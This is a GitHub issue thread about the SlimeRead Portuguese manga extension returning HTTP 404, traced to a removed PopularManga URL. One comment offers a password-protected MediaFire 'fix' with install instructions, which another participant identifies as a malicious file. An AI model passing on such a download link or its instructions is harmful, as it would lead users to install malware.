### ISSUE TITLE
Slime Read (PT-Br Source) Error HTTP 404. PopularManga URL has been removed.

### ISSUE THREAD

**Issue by EvaldoCeBr** [keiyoushi/tachiyomi-extensions-source#4855]
### Source information

SlimeRead 1.4.12

### Source language

Portuguese Brazilian 

### Steps to reproduce

When entering the source, an HTTP 404 error appears.

![Screenshot_2024-08-30-14-18-16-603_app mihon](https://github.com/user-attachments/assets/04ae7578-1243-47cb-a85e-9cb74ea2b80c)

### Expected behavior

Enter and see the contents of the source.

### Actual behavior

HTTP error 404 appears.

### Mihon/Tachiyomi version

0.16.5

### Android version

Android 12

### Acknowledgements

- [X] I have searched the existing issues and this is a new ticket, **NOT** a duplicate or related to another open or closed issue.
- [X] I have written a short but informative title.
- [X] I have updated the app to version **[0.15.3](https://github.com/mihonapp/mihon/releases/latest)**.
- [X] I have updated all installed extensions.
- [X] I have tried the [troubleshooting guide](https://tachiyomi.org/help/guides/troubleshooting/).
- [X] If this is an issue with the app itself, I should be opening an issue in the [app repository](https://github.com/tachiyomiorg/tachiyomi/issues/new/choose).
- [X] I will fill out all of the requested information in this form.

**Comment by Smol-Ame** [comment]
Open the source in WebView or open it in your own browser

**Comment by EvaldoCeBr** [comment]
> Open the source in WebView or open it in your own browser

It opens in WebView or another browser, but it doesn't open normally in the app.

**Comment by Smol-Ame** [comment]
You might be looking at a cached page

![Screenshot_20240830_122944_Mihon.png](https://github.com/user-attachments/assets/b8bcc40c-3c64-440b-b729-6de898f5c56a)

![Screenshot_20240830_123051_Firefox Nightly.png](https://github.com/user-attachments/assets/7ac45f66-bade-4da3-93eb-a3dc825f5d23)

**Comment by EvaldoCeBr** [comment]
> You might be looking at a cached page
> 
> ![Screenshot_20240830_122944_Mihon.png](https://github.com/user-attachments/assets/b8bcc40c-3c64-440b-b729-6de898f5c56a)
> 
> ![Screenshot_20240830_123051_Firefox Nightly.png](https://github.com/user-attachments/assets/7ac45f66-bade-4da3-93eb-a3dc825f5d23)
> 
> 

I have already cleared the cash and it continues to enter normally through WebView and browser. It is even possible to log in to the website.

![Screenshot_2024-08-30-17-22-31-784_app.mihon.jpg](https://github.com/user-attachments/assets/8706338f-b687-47af-b5bc-0afa9d9c7854)

![Screenshot_2024-08-30-17-23-00-969_com.android.chrome.jpg](https://github.com/user-attachments/assets/ac906f56-2623-4e3a-bbea-89248c3c4dd6)

![IMG_20240830_172934.jpg](https://github.com/user-attachments/assets/0e947171-400b-4cb1-81c6-3f72a78f1166)

**Comment by Smol-Ame** [comment]
Maybe geo-blocking then, gotta wait for someone who can access the site to see if there's some sort of issue

**Comment by nomaxsnx** [comment]
![Screenshot_2024-08-30-22-50-51-517_app mihon](https://github.com/user-attachments/assets/f1e628fa-fa7a-44f4-8aee-20aff393ac51)

De primeira

Obs: recomendo que vc entra no discord das extensão, pra ver se houve alguma coisa com site

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Smol-Ame** [comment]
Don't touch the message above, it is a malicious file.

**Comment by EvaldoCeBr** [comment]
> ![Screenshot_2024-08-30-22-50-51-517_app mihon](https://github.com/user-attachments/assets/f1e628fa-fa7a-44f4-8aee-20aff393ac51)
> 
> De primeira
> 
> Obs: recomendo que vc entra no discord das extensão, pra ver se houve alguma coisa com site

Vai na aba popular vê se abre!

**Comment by choppeh** [comment]
PopularManga URL has been removed.

**Comment by EvaldoCeBr** [comment]
> PopularManga URL has been removed.

Isso!

**Comment by EvaldoCeBr** [comment]
> PopularManga URL has been removed.

É fácil de concertar?
